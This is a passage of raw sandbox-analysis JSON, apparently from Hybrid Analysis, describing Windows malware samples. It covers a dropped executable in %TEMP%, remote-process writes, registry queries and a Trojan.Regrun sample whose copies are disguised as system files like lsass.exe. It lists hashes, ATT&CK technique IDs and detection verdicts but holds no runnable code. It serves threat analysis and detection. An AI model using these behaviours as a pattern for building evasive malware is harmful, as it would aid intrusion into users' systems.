SERVER\"; Key: \"\"; Value: \"\")\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\DIAGNOSTICS\"; Key: \"\"; Value: \"\")\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"\"; Value: \"\")\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\\TRACING\"; Key: \"\"; Value: \"\")\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLEAUT\"; Key: \"\"; Value: \"\")\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" trying to touch file \"c:\\6hgtwjt\\625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\"\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" trying to touch file \"c:\\6625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\"\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\gegdsimsogm.exe\"\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" trying to touch file \"C:\\Windows\\System32\\imm32.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\gegdsimsogm.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" trying to access non-existent file \"C:\\625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe.Local\\\"\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\gegdsimsogm.exe:Zone.Identifier\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"625B374340B41EF873CD09B09719BD85D778D15C530E4E87C60F52EA5879B895\"; Value: \"\")\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\"; Value: \"\")\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"OOBEINPROGRESS\"; Value: \"\")\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"SYSTEMSETUPINPROGRESS\"; Value: \"\")\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"gegdsimsogm.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\gegdsimsogm.exe]- [targetUID: 00000000-00006024]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" called \"IsWow64Process\" with parameter \"6024\" - (UID: 00000000-00006024)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006024)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "binary-71", "type": 8, "relevance": 1, "name": "Sample file has high entropy (likely encrypted/compressed content)", "description": "Sample file \"sample.bin\" has high entropy 7.633630183749063", "origin": "Binary File", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "static-92", "relevance": 5, "name": "PE file has unusual entropy resources", "description": "\"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895\" has resource with unusual entropy \"RT_ICON:7.90751243709\"\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895\" has resource with unusual entropy \"RT_ICON:7.91304752416\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"gegdsimsogm.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\gegdsimsogm.exe]- [targetUID: 00000000-00006024]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-9", "type": 6, "relevance": 4, "name": "Queries process information", "description": "\"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" queried SystemProcessInformation at 00000000-00006024-00000105-93437 [PID: 6024]\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" queried SystemProcessInformation at 00000000-00006024-00000105-124274125 [PID: 6024]\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" queried SystemProcessInformation at 00000000-00006024-00000105-124512932 [PID: 6024]\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" queried SystemProcessInformation at 00000000-00006024-00000105-124809454 [PID: 6024]\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" queried SystemProcessInformation at 00000000-00006024-00000105-125027787 [PID: 6024]\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" queried SystemProcessInformation at 00000000-00006024-00000105-125277271 [PID: 6024]\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" queried SystemProcessInformation at 00000000-00006024-00000105-125510946 [PID: 6024]\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" queried SystemProcessInformation at 00000000-00006024-00000105-125729142 [PID: 6024]\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" queried SystemProcessInformation at 00000000-00006024-00000105-126040975 [PID: 6024]\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" queried SystemProcessInformation at 00000000-00006024-00000105-126301584 [PID: 6024]\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" queried SystemProcessInformation at 00000000-00006024-00000105-126524082 [PID: 6024]\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" queried SystemProcessInformation at 00000000-00006024-00000105-127679795 [PID: 6024]\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" queried SystemProcessInformation at 00000000-00006024-00000105-127929982 [PID: 6024]\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" queried SystemProcessInformation at 00000000-00006024-00000105-128176273 [PID: 6024]\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" queried SystemProcessInformation at 00000000-00006024-00000105-128397376 [PID: 6024]\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" queried SystemProcessInformation at 00000000-00006024-00000105-128682844 [PID: 6024]\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" queried SystemProcessInformation at 00000000-00006024-00000105-128910730 [PID: 6024]\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" queried SystemProcessInformation at 00000000-00006024-00000105-129205620 [PID: 6024]\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" queried SystemProcessInformation at 00000000-00006024-00000105-129457463 [PID: 6024]\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" queried SystemProcessInformation at 00000000-00006024-00000105-129681315 [PID: 6024]\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" queried SystemProcessInformation at 00000000-00006024-00000105-129890848 [PID: 6024]\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" queried SystemProcessInformation at 00000000-00006024-00000105-130109166 [PID: 6024]\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" queried SystemProcessInformation at 00000000-00006024-00000105-130340302 [PID: 6024]\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" queried SystemProcessInformation at 00000000-00006024-00000105-130685930 [PID: 6024]\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" queried SystemProcessInformation at 00000000-00006024-00000105-130966482 [PID: 6024]", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895\" has section name .data with entropy \"7.99025147285\"\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895\" has section name .rsrc with entropy \"6.36545788238\"\n \"gegdsimsogm.exe\" has section name .text with entropy \"6.5972433923\"\n \"gegdsimsogm.exe\" has section name .data with entropy \"7.7396514094\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Cryptographic Related", "identifier": "binary-60", "type": 8, "relevance": 5, "name": "Dropped file has high entropy (likely encrypted/compressed content)", "description": "Dropped file \"%TEMP%\\gegdsimsogm.exe\" has high entropy 7.263065732858071", "origin": "Binary File", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\gegdsimsogm.exe\" (Handle: 708)\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\gegdsimsogm.exe\" (Handle: 708)\n \"625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\gegdsimsogm.exe\" (Handle: 708)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9
https://hybrid-analysis.com/sample/78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9
Hybrid Analysis - Killers
{"size": 163903, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9", "sha256": "78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9", "av_detect": 92, "vx_family": "Trojan.Regrun", "threat_score": 85, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 64, "total_signatures": 134, "extracted_files": [{"name": "services.exe", "file_size": 163903, "sha256": "78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "D3_08.exe", "file_size": 163903, "sha256": "78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "shell.exe", "file_size": 163903, "sha256": "500eeeefde405098b44572a403901abc34369a20c27fb8695514792a527e7e7c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Data HAPUBWS.exe", "file_size": 163903, "sha256": "e149665c022f5b3804d681ee217a776f0bfd5b45e05ab60cd547e358f0c2c09c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Empty.pif", "file_size": 163903, "sha256": "097bd8f0d8da4320eaff1f2244be680b80797c130a28485534def53bca49e708", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "New Folder.exe", "file_size": 163903, "sha256": "2e860aa8a460445b63597d061c11bb80384fc66033d97ca715511ee7b1090a50", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "WINLOGON.EXE.bin", "file_size": 163903, "sha256": "ae3c1edb7efb45323e83e57169b768330b7fea280b7179895bd538ac0a7e456d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IEXPLORER.EXE.67EE4A6B.bin", "file_size": 163903, "sha256": "2120a70eb6daf0edf0cc554bcc1796d724b4972527715df770ec5510964f52fd", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "CSRSS.EXE.bin", "file_size": 163903, "sha256": "23dfc72b08e7c9724848ee35583465cd4526866bc691a880e3b92999d9aba795", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "SERVICES.EXE", "file_size": 163903, "sha256": "78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IEXPLORER.EXE.67EE4B2F.bin", "file_size": 163903, "sha256": "c862812cb66c49029ded882ccc58137ad54dfa008eadb53d1e33e8c61efd9b51", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "D3_08.EXE.67EE473F.bin", "file_size": 163903, "sha256": "121557a5a6064a200e85f01888227687e0c1252e983a581d679f001fc63fe98b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "SMSS.EXE", "file_size": 163903, "sha256": "78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "LSASS.EXE", "file_size": 163903, "sha256": "78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "MrD3_08.scr", "file_size": 163903, "sha256": "e462f8465f10fb0a54a2e583e37481c512ec3d095d8fd9e529bf96f1df6f628f", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IEXPLORER.EXE.67EE4741.bin", "file_size": 163903, "sha256": "40d83ecc5779bfc4d12a34bb160c57f2d12d82eb2a69c3e4f823d0cebfa973b8", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "PuRn4m4.txt", "file_size": 441, "sha256": "c8cfecfb4260f0488e4152cdaaca8854865f0e20d15e9e37cba26f81db38c195", "type_tags": ["text"], "description": "ASCII text, with CRLF line terminators", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "lsass.exe", "file_size": 163903, "sha256": "78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9", "type_tags": ["peexe", "executable"], "description": "PE32 executable 